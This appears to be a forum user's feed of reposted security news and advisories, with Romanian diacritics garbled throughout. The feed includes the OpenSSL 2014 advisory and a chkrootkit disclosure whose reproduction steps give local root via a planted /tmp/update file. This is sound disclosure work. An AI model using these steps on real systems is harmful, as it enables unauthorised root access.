iar ea era purt?tor de cuvânt al pre?edintelui României Ion Iliescu. El a subliniat c? s-au întâlnit personal "o dat? sau de dou? ori" în ultimii opt ani. Sursa: Hackerul Guccifer, condamnat la ?apte ani de închisoare cu executare - Mediafax
  7. Nytro
    Proiectul legii securitatii cibernetice a Romaniei: Furnizorii de internet si telefonie trebuie sa permita accesul la datele clientilor catre reprezentantii SRI, MApN, MAI, ORNISS, SIE, STS, SPP, CERT-RO si ANCOM 'la solicitarea motivata' a acestora de Adrian VasilacheVineri, 6 iunie 2014, 12:37 etinatorii de infrastructuri cibernetice (n.a toti furnizorii de internet si telefonie) trebuie sa permita accesul la datele detinute, relevante în contextul solicit?rii, reprezentantilor Serviciului Român de Informa?ii, Ministerului Ap?r?rii Na?ionale, Ministerului Afacerilor Interne, Oficiului Registrului Na?ional al Informa?iilor Secrete de Stat, Serviciului de Informa?ii Externe, Serviciului de Telecomunica?ii Speciale, Serviciului de Protec?ie ?i Paz?, CERT-RO ?i ANCOM la "solicitarea motivata" a acestora. Dispozitia apare in proiectul Legii securitatii cibernetice a Romaniei, initiat si adoptat de Guvern in 30 aprilie, si dezbatut acum in Parlament. Dispozitia din proiectul de lege a fost semnalata initial de juristul Bogdan Manolea pe blogul sau: Drept & Internet - noutati si opinii. Iata ce prevede articolul 17 din acest proiect legislativ: Art. 17 - (1) Pentru realizarea securit??ii cibernetice, de?in?torii de infrastructuri cibernetice au urm?toarele responsabilit??i: a) s? acorde sprijinul necesar, la solicitarea motivat? a Serviciului Român de Informa?ii, Ministerului Ap?r?rii Na?ionale, Ministerului Afacerilor Interne, Oficiului Registrului Na?ional al Informa?iilor Secrete de Stat, Serviciului de Informa?ii Externe, Serviciului de Telecomunica?ii Speciale, Serviciului de Protec?ie ?i Paz?, CERT-RO ?i ANCOM, în îndeplinirea atribu?iilor ce le revin acestora ?i s? permit? accesul reprezentan?ilor desemna?i în acest scop la datele de?inute, relevante în contextul solicit?rii; Proiectul de lege are urmatoarea definitie pentru infrastructuri cibernetice: infrastructuri cibernetice - infrastructuri din domeniul tehnologiei informa?iei ?i comunica?iilor, constând în sisteme informatice, aplica?ii aferente, re?ele ?i servicii de comunica?ii electronice; Proiectul Legii securitatii cibernetice a Romaniei a fost adoptat in sedinta Guvernului din data de 30 aprilie, in aceeasi zi in care a fost scos in dezbatere publica pe site-ul Ministerului pentru Societatea Informationala (MSI). Proiectul a fost inregistrat la Camera Deputatilor in data de 27 mai 2014. Comisia pentru ap?rare, ordine public? ?i siguran?? na?ional? si Comisia pentru tehnologia informa?iei ?i comunica?iilor au avut termen de depunere amendamente data de 3 iunie 2014, iar in 10 iunie 2014 au termen pentru depunere raport. Potrivit proiectului Legii securitatii cibernetice a Romaniei, detinatorii de infrastructuri cibernetice, furnizori de servicii de internet, au obligatia de a-si notifica, de indata, clientii, persoane de drept public si privat, in situatiile in care sistemele informatice utilizate de acestia au fost implicate in incidente sau atacuri cibernetice si de a dispune masurile necesare in vederea restabilirii conditiilor normale de functionare. Nerespectarea acestei obligatii constituie contraventie si se va pedepsi cu amenda de la 500 la 5000 de lei. Cheltuielile firmelor private legate de executarea dispozitiilor acestei legi vor fi deductibile fiscal in conditiile si cuantumul stabilit de Ministerul Finantelor Publice. Pentru detalii privind acest proiect, citeste si: UPDATE Proiectul Legii securitatii cibernetice a Romaniei: Furnizorii de servicii de internet risca amenzi de pana la 5000 lei daca nu-si notifica, de indata, clientii in cazul incidentelor sau atacurilor cibernetice Sursa: ?Proiectul legii securitatii cibernetice a Romaniei: Furnizorii de internet si telefonie trebuie sa permita accesul la datele clientilor catre reprezentantii SRI, MApN, MAI, ORNISS, SIE, STS, SPP, CERT-RO si ANCOM 'la solicitarea motivata' a acesto
  8. Nytro
    UK wants to imprison hackers for life Life terms sought for hacks causing death, injury, or damage to national security. by David Kravets - June 5 2014, 6:28pm GTBDT The UK government is mulling life sentences for hackers whose attacks have catastrophic consequences. The proposal, outlined in the Queen's speech Wednesday, would update the Computer Misuse Act and impose life terms for those convicted of "cyberattacks which result in loss of life, serious illness or injury or serious damage to national security, or a significant risk thereof." The Guardian said the plan would also increase maximum sentences for industrial espionage from 10 to 14 years. It's conceivable that a hacker in the US could get a life term, too, although no individual statute carries that penalty. The longest sentence ever given to a hacker in the US was 20 years—Albert Gonzalez was sentenced in 2010 in Boston after being convicted of leading a conspiracy that hijacked more than 90 million credit and debit card numbers from TJX and other retail outlets. Sursa: UK wants to imprison hackers for life | Ars Technica
  9. Nytro
    Pagubele provocate de Edward Snowden NSA sunt mai mici decât s-a estimat de Lumini?a Bogdan Fostul consultant al NSA, Edward Snowden, nu pare s? fie luat chiar atât de multe documente de la Agen?ia american? pentru Securitate Na?ional? cât s-a crezut ini?ial, potrivit cotidianului The Washington Post. Pagubele sunt înc? importante, dar ''se pare c? el n-a luat atât de multe'' documente cât s-a crezut ini?ial, a declarat directorul serviciilor americane de informa?ii, James Clapper, citat de cotidianul The Washington Post. Fostul consulant al NSA Edward Snowden a declan?at un scandal la nivel mondial, dup? ce oferit presei zeci de mii de documente care dezv?luie amploarea supravegherii efectuate de Agen?ia american? pentru Securitate Na?ional?. ''Suntem pe punctul de a verifica, dar credem c? multe documente pe care le-a consultat n-a putut s? le descarce", a declarat Clapper. "Exist? lucruri pe care noi credeam c? le ob?inuse ?i acum se pare c? nu le-a ob?inut", a ad?ugat el. Potrivit The Washington Post, aceast? analiz? contrasteaz? cu scenariul ini?ial catastrofal conturat de comunitatea de informa?ii din SUA, care a sugerat c? Snowden, între timp inculpat pentru spionaj, "ar fi compromis re?elele de comunicare care formau sistemele de comandament ?i control militar". La un an dup? primele dezv?luiri în cotidianul britanic The Guardian, la 5 iunie 2013, detaliile continu? s? apar? în acest caz. Cotidianul The New York afirma, duminic?, pe baza documentelor oferite de Snowden, c? NSA recupereaz? fotografiile unor persoane pentru a le folosi în programele de recunoa?tere facial?. Sursa: Pagubele provocate de Edward Snowden NSA sunt mai mici decât s-a estimat - Mediafax
  10. Nytro
    Vodafone DEZV?LUIE date despre intercept?rile din anumite state de Marius Oncu - Mediafax Vodafone a dezv?luit vineri existen?a unor conexiuni directe ale agen?iilor guvernamentale la re?elele grupului, care permit interceptarea conversa?iilor în unele dintre ??rile în care opereaz?, îns? pentru România ?i alte câteva state nu a putut prezenta informa?ii fiind interzis de legisla?ie. Conexiunile agen?iilor guvernamentale na?ionale sunt utilizate la scar? larg? în multe dintre cele 29 de ??ri care au avut pe parcursul anului trecut acces la re?eaua grupului, inclusiv în baza unor mandate, a afirmat grupul, într-un raport care rupe t?cerea asupra utiliz?rii la scar? tot mai larg? de c?tre autorit??i a intercept?rilor re?elelor telefonice ?i de transmisie de date pentru a spiona proprii cet??eni, scrie publica?ia britanic? The Guardian. Agen?iile au instalat conexiuni directe la re?eaua Vodafone ?i a altor operatori telecom, ceea ce le permite s? asculte ?i s? înregistreze live conversa?ii, iar în anumite cazuri s? localizeze persoanele. În România, Albania, Egipt, Ungaria, India, Malta, Qatar, Africa de Sud ?i Turcia este interzis? dezv?luirea oric?ror informa?ii legate de interceptarea convorbirilor telefonice ?i mesajelor, inclusiv dac? astfel de capabilit??i exist?. "Este înfior?tor ca guvernele s? poat? accesa convorbirile telefonice cu simpla ap?sare a unui buton", a declarat directorul organiza?iei Liberty, Shami Chakrabarti, citat de cotidianul britanic. În circa ?ase din ??rile în care Vodafone opereaz?, legea oblig? operatorii telecom s? instaleze conexiuni directe de acces sau s? permit? autorit??ilor s? fac? acest lucru. Grupul nu a nominalizat statele, întrucât unele dintre acestea ar putea r?spunde prin contram?suri incluzând arestarea unor angaja?i. Sistemele directe de acces nu necesit? mandate, iar companiile nu au informa?ii despre identitatea sau num?rul clien?ilor viza?i. Supravegherea în mas? poate avea loc pe orice re?ea, f?r? ca autorit??ile s? fie nevoite s? se justifice companiilor. "Acestea sunt scenariile de co?mar pe care le imaginam. Nu a? fi crezut niciodat? c? operatorii telecom sunt complici în asemenea m?sur?. Este un pas curajos al Vodafone ?i sper?m ca ?i alte companii s? prind? mai mult curaj în privin?a dezv?luirilor, dar ceea ce avem nevoie este s? fim noi mai curajo?i ?i s? lupt?m împotriva cererilor ilegale ?i chiar a legilor", a declarat Gus Hosein, director al organiza?uei Privacy International, care a dat în judecat? guvernul britanic pentru intercept?ri în mas?. ?eful diviziei Vodafone pentru informa?ii cu caracter personal, Stephen Deadman, a admis existen?a conexiunilor directe folosite de autorit??i pentru intercept?ri. "Facem un apel pentru a pune cap?t accesului direct ca modalitate pentru autorit??i de a ob?ine date despre comunica?iile popula?iei. F?r? un mandat, nu exist? vizibilitate din exterior. Dac? primim o cerere, putem s? încerc?m s? ne opunem. Faptul c? autorit??ile trebuie s? emit? o hârtie reprezint? o limit? important? asupra modului cum este folosit? aceast? putere", a spus el. Grupul britanic a f?cut apel ca toate conexiunile care ofer? acces direct s? fie oprite, iar legile care le permit s? fie anulate. Toate ??rile ar trebui s? publice date despre num?rul de mandate emise, potrivit Vodafone. Acestea sunt de dou? tipuri - cele pentru con?inutul convorbirilor ?i mesajelor, precum ?i cele pentru metadate (date care descriu alte date - n.r.), care pot acoperi loca?ia utilizatorului unui dispozitiv, timpul ?i data comunica?iei, precum ?i persoanele cu care a comunicat. Cotidianul The Guardian a realizat un tabel în care a inclus la categoria metadate ?i mandatele pentru informa?ii precum nume ?i adrese. Informa?iile sunt pentru 2013 sau pentru cel mai recent an ?i includ date atât din raportul Vodafone, cât ?i disponibile de la autorit??ile na?ionale. Un singur mandat poate viza, îns?, sute de persoane ?i dispozitive, în timp ce o singur? persoan? poate fi ?inta mai multor mandate. Potrivit The Guardian, Malta este una dintre cele mai spionate ??ri din Europa. Vodafone a procesat 3.773 de cereri pentru metadate la o popula?ie de numai 420.000 de oameni. În Italia, unde activit??ile mafiei necesit? un nivel mai ridicat de supraveghere, grupul britanic a primit 606.000 de cereri pentru metadate, mai mult decât în oricare alt? ?ar?. Spania, unde autorit??ile au avut de luptat cu atacuri ale terori?tilor islami?ti ?i basci, Vodafone a primit peste 24.000 de mandate pentru con?inut. Agen?iile din Cehia au transmis aproape 8.000 de cereri pentru con?inut. Dup? Italia, Cehia este ?ara cu cea mai ridicat? accesare de metadate, vizate de 196.000 de mandate în cel mai recent an pentru care au fost publicate cifre. Tanzania, una dintre pu?inele ??ri africane în care activeaz? Vodafone, a emis 99.000 de mandate pentru metadate. Tabelul întocmit de cotidianul britanic noteaz? la România: "Este ilegal? dezv?luirea oric?rui aspect despre modul în care se efectueaz? intercept?rile". Sursa: Vodafone DEZV?LUIE date despre intercept?rile din anumite state. În România divulgarea este interzis? - Mediafax
  11. Nytro

    Fun stuff

    Nytro replied to Wisa's topic in Discutii non-IT

  12. Nytro
    [h=2]Romania digitala - sa dai cu subsemnatul la WiFi free si cartele pre-pay !?![/h] O propunere de lege de 5 articole adoptata de Guvernul Romaniei in 30 Aprilie 2014 care cere inregistrarea obligatorie a utilizatorilor de free WiFi si a cartelelor pre-pay a trecut in viteza super-sonica prin Senat, iar in Camera Deputatilor are termene de 2 zile pentru depunere amendamente si raport - ne arata adevarata fata a Romaniei digitale dorita de guvernantii nostri - un spatiu virtual in care sa dai cu subsemnatul pentru orice utilizare a tehnicilor de comuncatie si in care (prin noul proiect de lege privind securitatea cibernetica) datele sa fie accesibile direct si fara mandat de toate serviciile secrete si nesecrete. Intr-un stil traditional de ne-dezbatere publica (proiectul NU a fost transmis societatii civile si industriei inainte de adoptarea de guvern si niciuna din comisiile Senatului NU a fost interesata de alte opinii) riscam sa fie adoptate niste articole lacunare si care nu au niciun efect practic serios, in afara de limitarea drepturilor cetatenilor. Dar sa analizam mai in detaliu. Articol complet: Romania digitala - sa dai cu subsemnatul la WiFi free si cartele pre-pay !?!
  13. Nytro
    OpenSSL Security Advisory [05 Jun 2014] ======================================== SSL/TLS MITM vulnerability (CVE-2014-0224) =========================================== An attacker using a carefully crafted handshake can force the use of weak keying material in OpenSSL SSL/TLS clients and servers. This can be exploited by a Man-in-the-middle (MITM) attack where the attacker can decrypt and modify traffic from the attacked client and server. The attack can only be performed between a vulnerable client *and* server. OpenSSL clients are vulnerable in all versions of OpenSSL. Servers are only known to be vulnerable in OpenSSL 1.0.1 and 1.0.2-beta1. Users of OpenSSL servers earlier than 1.0.1 are advised to upgrade as a precaution. OpenSSL 0.9.8 SSL/TLS users (client and/or server) should upgrade to 0.9.8za. OpenSSL 1.0.0 SSL/TLS users (client and/or server) should upgrade to 1.0.0m. OpenSSL 1.0.1 SSL/TLS users (client and/or server) should upgrade to 1.0.1h. Thanks to KIKUCHI Masashi (Lepidum Co. Ltd.) for discovering and researching this issue. This issue was reported to OpenSSL on 1st May 2014 via JPCERT/CC. The fix was developed by Stephen Henson of the OpenSSL core team partly based on an original patch from KIKUCHI Masashi. DTLS recursion flaw (CVE-2014-0221) ==================================== By sending an invalid DTLS handshake to an OpenSSL DTLS client the code can be made to recurse eventually crashing in a DoS attack. Only applications using OpenSSL as a DTLS client are affected. OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h. Thanks to Imre Rad (Search-Lab Ltd.) for discovering this issue. This issue was reported to OpenSSL on 9th May 2014. The fix was developed by Stephen Henson of the OpenSSL core team. DTLS invalid fragment vulnerability (CVE-2014-0195) ==================================================== A buffer overrun attack can be triggered by sending invalid DTLS fragments to an OpenSSL DTLS client or server. This is potentially exploitable to run arbitrary code on a vulnerable client or server. Only applications using OpenSSL as a DTLS client or server affected. OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h. Thanks to Jüri Aedla for reporting this issue. This issue was reported to OpenSSL on 23rd April 2014 via HP ZDI. The fix was developed by Stephen Henson of the OpenSSL core team. SSL_MODE_RELEASE_BUFFERS NULL pointer dereference (CVE-2014-0198) ================================================================= A flaw in the do_ssl3_write function can allow remote attackers to cause a denial of service via a NULL pointer dereference. This flaw only affects OpenSSL 1.0.0 and 1.0.1 where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the default and not common. OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 1.0.1 users should upgrade to 1.0.1h. This issue was reported in public. The fix was developed by Matt Caswell of the OpenSSL development team. SSL_MODE_RELEASE_BUFFERS session injection or denial of service (CVE-2010-5298) =============================================================================== A race condition in the ssl3_read_bytes function can allow remote attackers to inject data across sessions or cause a denial of service. This flaw only affects multithreaded applications using OpenSSL 1.0.0 and 1.0.1, where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the default and not common. OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 1.0.1 users should upgrade to 1.0.1h. This issue was reported in public. Anonymous ECDH denial of service (CVE-2014-3470) ================================================ OpenSSL TLS clients enabling anonymous ECDH ciphersuites are subject to a denial of service attack. OpenSSL 0.9.8 users should upgrade to 0.9.8za OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 1.0.1 users should upgrade to 1.0.1h. Thanks to Felix Gröbert and Ivan Fratrić at Google for discovering this issue. This issue was reported to OpenSSL on 28th May 2014. The fix was developed by Stephen Henson of the OpenSSL core team. Other issues ============ OpenSSL 1.0.0m and OpenSSL 0.9.8za also contain a fix for CVE-2014-0076: Fix for the attack described in the paper "Recovering OpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack" Reported by Yuval Yarom and Naomi Benger. This issue was previously fixed in OpenSSL 1.0.1g. References ========== URL for this Security Advisory: http://www.openssl.org/news/secadv_20140605.txt Note: the online version of the advisory may be updated with additional details over time. Sursa: https://www.openssl.org/news/secadv_20140605.txt
  14. Nytro
    Date: Wed, 04 Jun 2014 10:50:57 +0200 From: Giuseppe Iuculano <iuculano@...ian.org> To: oss-security@...ts.openwall.com Subject: CVE-2014-0476 chkrootkit vulnerability Hi, Thomas Stangner reported the following chkrootkit vulnerability. We assigned CVE-2014-0476 Cheers, Giuseppe -------- Original Message -------- Subject: Serious chkrootkit vulnerability Date: Sun, 25 May 2014 00:53:00 +0200 From: Thomas Stangner <thomas.stangner@...zner.de> Organization: Hetzner Online AG To: team@...urity.debian.org Hi, we just found a serious vulnerability in the chkrootkit package, which may allow local attackers to gain root access to a box in certain configurations (/tmp not mounted noexec). The vulnerability is located in the function slapper() in the shellscript chkrootkit: # # SLAPPER.{A,B,C,D} and the multi-platform variant # slapper (){ SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c" SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \ ${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 " OPT=-an STATUS=0 file_port= if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}"> /dev/null 2>&1 then STATUS=1 [ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \ $egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print $7 }' | tr -d :` fi for i in ${SLAPPER_FILES}; do if [ -f ${i} ]; then file_port=$file_port $i STATUS=1 fi done if [ ${STATUS} -eq 1 ] ;then echo "Warning: Possible Slapper Worm installed ($file_port)" else if [ "${QUIET}" != "t" ]; then echo "not infected"; fi return ${NOT_INFECTED} fi } The line 'file_port=$file_port $i' will execute all files specified in $SLAPPER_FILES as the user chkrootkit is running (usually root), if $file_port is empty, because of missing quotation marks around the variable assignment. Steps to reproduce: - Put an executable file named 'update' with non-root owner in /tmp (not mounted noexec, obviously) - Run chkrootkit (as uid 0) Result: The file /tmp/update will be executed as root, thus effectively rooting your box, if malicious content is placed inside the file. If an attacker knows you are periodically running chkrootkit (like in cron.daily) and has write access to /tmp (not mounted noexec), he may easily take advantage of this. Suggested fix: Put quotation marks around the assignment. file_port="$file_port $i" I will also try to contact upstream, although the latest version of chkrootkit dates back to 2009 - will have to see, if I reach a dev there. Keep up the good work, Cheers, Thomas Sursa: oss-security - CVE-2014-0476 chkrootkit vulnerability
  15. Nytro
    Real life: WordPress < 3.6.1 PHP Object Injection - VaGoSec
  16. Nytro
    Mai adaug eu o conditie. Sa fiti VIP.
  17. Nytro
    The Art of Assembly Language Programming [TABLE=width: 615] [TR] [TD=width: 560, colspan: 6, align: left]The PDF version of "The Art of Assembly Language Programming" is a complete, high-quality version of the text. It is much easier to read and provides an excellent vehicle for printing your own copy of the text. However, to view and print PDF files, you will need a copy of Adobe's Acrobat reader program. You may obtain a free copy of this program for a wide variety of operating systems directly from Adobe.[/TD] [TD=width: 36][/TD] [/TR] [TR] [TD=width: 1][/TD] [TD=width: 16][/TD] [TD=width: 512, colspan: 5, align: left]If you have installed Adobe Acrobat Reader, clicking on the following links should automatically bring up the PDF version of the specified chapter.[/TD] [TD=width: 48][/TD] [TD=width: 36][/TD] [/TR] [TR] [TD=width: 1][/TD] [TD=width: 16][/TD] [TD=width: 16][/TD] [TD=width: 224, colspan: 1, align: left] Short Table of Contents Long Table of Contents Forward Chapter 1 Chapter 2 Chapter 3 Chapter 4 Chapter 5 Chapter 6 Chapter 7 Chapter 8 Chapter 9 Chapter 10 Chapter 11 Chapter 12 Chapter 13 Chapter 14 [/TD] [TD=width: 16][/TD] [TD=width: 256, colspan: 2, align: left] Chapter 15 Chapter 16 Chapter 17 Chapter 18 Chapter 19 Chapter 20 Chapter 21 Chapter 22 Chapter 23 Chapter 24 Chapter 25 Note: Appendix A is non-existant Appendix B Appendix C Appendix D Index [/TD] [/TR] [/TABLE] Sursa: Art of Assembly Language, PDF Files
  18. Nytro
    Nu mi se pare nimic critic: https://opencryptoaudit.org/reports/iSec_Final_Open_Crypto_Audit_Project_TrueCrypt_Security_Assessment.pdf
  19. Nytro
    Coding Principles Every Engineer Should Know Throughout my engineering career, I’ve had the opportunity work alongside and learn from many incredibly talented people, solve some serious technical challenges, and scale several successful companies. Recently, I was talking with the engineering team at Box about what I’ve learned along this journey, and what came out of that conversation were my personal engineering principals. These aren’t rules or engineering guidelines. They’re simply the principles that I pay attention to when I write and operate code. Be paranoid. This one comes naturally to me. Since I’m mostly self-taught as a programmer, I never trust computers. I never trust that the system I just launched is really up. That the bug I fixed is really fixed. That code really does work the way I think it does without a test. I don’t trust anything. I don’t even trust myself! I never trust that I understand anything as well as I think I do until I check more than once. Paranoia is my friend, and it should be your friend, too. Always try to find a way to test assumptions along some other path, or get a second set of eyes to see what you’ve missed. Most of the time it’s not needed. Sometimes it’s really important. Don’t lie to the computer. Another way to say this is “avoid leaky abstractions.” Don’t use systems in ways they’re not meant to be used. Don’t count on side effects. Don’t do things that won’t be obvious to the next person because the system wasn’t designed for them or they’re undocumented. If usage is three orders of magnitude more than current usage, then you should probably rethink the design. If the contract implies, but doesn’t guarantee, your use, you should change the component and the contract to be aligned. Computers are nasty things. They always bite when lied to, eventually. Keep it simple. We like building things and solving problems. That’s why we do what we do. But a lot of the time, just because we can see a problem that could be solved, doesn’t mean it’s useful to solve it right now. I always think of myself as a fairly dumb programmer?—?I like clean, simple designs that are easy to understand. And this is a high challenge?—?anyone can solve a problem in a complex way, but only good programmers can solve problems in simple, understandable ways. It’s much harder to really think through the problem and solve only what needs to be solved in a simple, robust manner. Making yourself understood is the most important thing. Most time in code is spent maintaining, not creating. First rule of optimizing: don’t. This is from a good book by John Bentley called Programming Pearls. (It’s explicitly meant to help you learn to think like an experienced programmer. It may be an old book but most of the lessons are incredibly relevant today.) Optimization can take many forms: speed, future-proofing, potential scale, possible uses, etc. The problem is, most optimization is ultimately never used, and, more or less by definition, optimization makes designs more complicated. So, first rule of thumb is don’t optimize until it’s really clear that you understand the problem completely. (His second rule: “don’t optimize, yet.” Meaning, even if you do understand it, don’t optimize until you really need to.) Don’t just fix the bug; fix all possibility of it ever happening again. Don’t be sorry if you made a mistake?—?be angry and make it something you never have to think about again. I hate bugs. I hate systems that let me create bugs. I hate it when my own software lets my fragile human brain down and I create a bug that could have been avoided. And I really, really hate fixing the same bug twice. So I try as much as I can, every single time I fix a bug, to think about the following: where else might this bug be happening now? Where might it happen in the future? What are the adjacent patterns that create similar bugs? And how can I kill all the bastards at once, right now? Question assumptions constantly. Because I have spent most of my time in my own startups, I’ve gotten in the habit of asking myself constantly “Why am I doing this? What problem does it solve? Is there a better way? Is there something else I could do instead that’s more important?” You should have that attitude all the time. Constantly be questioning the assumptions given to you. What’s the real problem you’re solving? Did someone ask you to solve an effect rather than the root cause? Is the solution complete? Over-complete? Is the impact worthwhile? Think long term. Slow down, it goes faster. This might be one of the most important ones. It’s easy to hack things out. As engineers, we like efficiency; we like to build as many things as we can. But if we don’t build for the long term, eventually it gets harder and harder to build anything. Sometimes we don’t understand the problem at first and we write code that we later have to back out. Sometimes we do things that are easy for our local problem, but make things worse or harder for someone else or for a larger problem. Sometimes we rush and don’t finish the design, and this causes much more time later on for someone to fix. Sometimes we don’t bother to write it the right way, we just make a copy or hack something in because we’re under time pressure or don’t want to really think it through. I’ve seen all these things too many times. Others have said this better than I have. But I’ll repeat?—?the goal is building the largest number of great features, reaching the largest number users over time. The area under the curve for a given day doesn’t add much, no matter how much gets done on that day, relative to all the days added together. Think long term. Care about your code. I guess this one doesn’t need much explanation, but it’s still something I see people missing from time to time. Take pride in your work! Care about the code you produce! I usually think of my poor future self, having to deal with my crappy code, when I’m tempted to be lazy and cut a corner. You don’t have to take this to an extreme?—?I used to joke at Google that other engineers treated their code like a pet, where my relationship with mine was more like a ranchers?—?pragmatic, not sentimental. But even still, I always hate it if my code isn’t well designed, doesn’t work well, isn’t readable, all that stuff. Cheap, fast, right?—?pick two. This is the iron triangle of software. This is the way the world of software engineering works. But it’s not an excuse for complacency. In fact, this is your opponent every single day. The difference between good and great programmers is often measured in how well they navigate the iron triangle. And really great ones find ways to bend it and get some of all three, more often than not. Try to be that kind of programmer?—?can you find a more elegant design that’s faster to build and is still right? Can you relax some constraint in the spec to get to the goal more quickly? You might not always be able to do that; in fact, you won’t beat the triangle. But if nothing else, make sure you understand what compromise you are choosing, and why, and that it’s the right one for the current situation. Conclusion: Be curious. Learn as much as you can, all the time. Okay, this one is more career advice than anything else. But if you’re not curious and don’t really care that much about learning new things as an engineer and don’t care about new tech or new languages or new ideas, then why are you here? By no means are my principles perfect or an absolute representation of thinking/acting like a successful engineer, but I’m willing to bet there’s a fair amount of overlap with what others might be thinking. I’d love to hear your thoughts. Written by Sam Schillace Sursa: https://medium.com/on-coding/coding-principles-every-engineer-should-know-b946b48cc946
  20. Nytro
    Bucuresti Bookfest
  21. Nytro
    Jegosilor, care ati fost? Muie _|_
  22. Nytro

    Demo... Stiti voi

    Nytro posted a topic in Linkuri

    De ceva timp: https://www.demonoid.ph/
  23. Nytro

    Useful stuff

    Nytro replied to Nytro's topic in Discutii non-IT

    [h=1]Aparatele se blocheaz?, iar astronau?ii au senza?ii stranii: ce este „Triunghiul Bermudelor spa?ial”, care produce aceste fenomene ciudate?[/h] Unele vehicule spa?iale, precum telescopul spa?ial Hubble, au fost proiectate astfel încât instrumentele delicate de la bordul lor s? închid? la trecerea prin zon?, pentru a evita defectarea lor. Unele defec?iuni ap?rute la sateli?ii re?elei Globalstar sunt atribuite tot trecerii sateli?ilor prin aceast? regiune. Se crede c? tot radia?iile puternice din aceast? regiune ar fi cauza fosfenelor (un fel de scântei sau „stele zbur?toare” care apar în câmpul vizual) raportate de astronau?i. Link: Aparatele se blocheaz?, iar astronau?ii au senza?ii stranii: ce este „Triunghiul Bermudelor spa?ial”, care produce aceste fenomene ciudate?
  24. Nytro
    Da, nu prea ai ce ii face Si versiunea Desktop e "safe". Uite cateva detalii: https://rstforums.com/forum/85016-windows-7-security-features.rst Cateva idei: - pe Desktop nu prea ai limitari la ce poate face un program (desi nu ar fi o idee rea sa se implementeze asa ceva) - pe Desktop ai o flexibilitate mult mai mare in dezvoltarea aplicatiilor, de la exe la bat-uri si X limbaje de programare - daca consideram ca versiunea "Desktop" nu e "safe", atunci nici Linux-ul nu e "safe" deoarece la fel ca pe Windows, o aplicatie malitioasa e foarte usor de facut, de la executabile la "rm -rf"-uri A aparut Windows Phone mai tarziu, dar a avut timp sa invete si sa nu faca aceleasi greseli ca Android si iOS.
  25. Nytro
    how to hack a windows phone In today’s how to we will be discussing on how to hack a Windows Phone 8. Every hacker should know about the internals of a device and operating system before he could attempt to compromise it. So lets try to understand the underlying hardware and OS security before we try to break it. To begin, we will try to compromise the hardware so that we can gain access to the hardware and then exploit the OS and ultimately take control of it or at least to steal data from it. Windows Phone employs UEFI Firmware Hardware at the very low level. In addition to that, every hardware which runs Windows Phone 8 OS has to be certified by Microsoft. Now when we say certified, it also means that all the hardware has to be signed and the chips will be burned with the keys from Microsoft. The “Trusted Boot Chain” component will make sure that all the signatures are in place and if they are valid before and during the process. Every program written in the silicon chip has to be signed including the BIOS, drivers etc. On top of these Windows Phone 8 device will also come with a TPM chip which means your encrypted data it is as good your Windows 7 & 8 PC. UEFI Windows Phone Lets see what are the options we have to break the security of the device. Hardware Now that we know all the components / programs are verified for the signature by the “Trusted Boot Chain”, why don’t we try to spoof the boot chain program itself with our own. If we are able to do that then we could easily make the device load our own components instead of the Windows Phone OS exploiting it completely naked. Though at the first look it is appears to be a very good idea, unfortunately all the hardware chips which can’t or can be overwritten comes with something called an efuse. The moment when you are trying to write something in these chips without a valid signature which will be there only with Microsoft and the device manufacturer, the efuse will trip. Once the efuse trips off, the boot loader will not be able to boot up your device. Congratulations! now you have a phone which is officially no better than a brick. For a moment even if we assume that you somehow fooled the efuse, the device still wont boot up just because you don’t have a valid key. Operating System Windows NT kernel it is. The Redmond guys have made sure that its sturdy enough. Windows NT kernel along with “Code Signing” makes a killer shield that you will not be able to penetrate. If you think you can get the control of the kernel using some code, wait till you read the “Malicious Code” section. For now lets think about the Windows Phone updates. Windows Phone does do regular updates just like your PC so what if we can trick the windows phone to install my program? Unfortunately the windows phone is programmed to get the updates only from the Microsoft update servers and no other place. Still its no big deal because I can always trick my network to believe some malicious hardware / software as the update server. Sadly, the update will again need the code signing process to pass. You can never break through it unless you are hacking into the Microsoft update server; definitely not a great plan. Storage How about the internal storage itself? Why don’t we break the phone take out the internal storage and may be at least try to steal the data? But wait, the storage again uses a 128 bit Bitlocker for encryption. The drive remains encrypted until the boot loader performs the job completely. The TPM chip which comes with the hardware is the one which manages the key for the encryption which means that once the disk is outside the hardware, you will need the 128 bit recovery key to break in the data. The storage behaves the same way as what your bitlocked hard drive behaves. Brute force opening a encryption is a very well known procedure to break encryption however its impossible when it comes to a 128 bit encryption. So to understand the quantum of complexity, lets assume that you have 10 million computers where every computer can process 100 billion keys per second (higher than 100GHz) and if you put them all together to crack the key, it will take 1013 years to find the key which is longer than the age of universe itself. If you are thinking of trying the PIN instead, you can always configure your phone to automatically wipe after a amount of incorrect tries. Some people try to snoop the data from the disk after it is wiped because it is easier that way since it wont have any encryption constraints. Luckily for the user what Windows Phone, it never decrypts the data but it wipes the encrypted data along with the key. You can be pretty sure that not even NSA can retrieve them. Malicious Code We have now almost come to the last and the mot favorite resort of a hacker. Most the hackers disassemble the system instructions and try to inject or alter the commands in the memory location. However the app model which windows phone function is always a sandbox, which means the app will have its own area where it can execute store data and perform actions. Windows Phone with the advantage of Code Signing will sign the apps based on the feature set they are allowed to access. E.g.) If a program does not have a valid signature to access the Camera, it wont be able to. This is true for any feature or hardware access in the device. So even for a moment if we assume that you are able to try writing something into the system memory location of the phone, the “Code 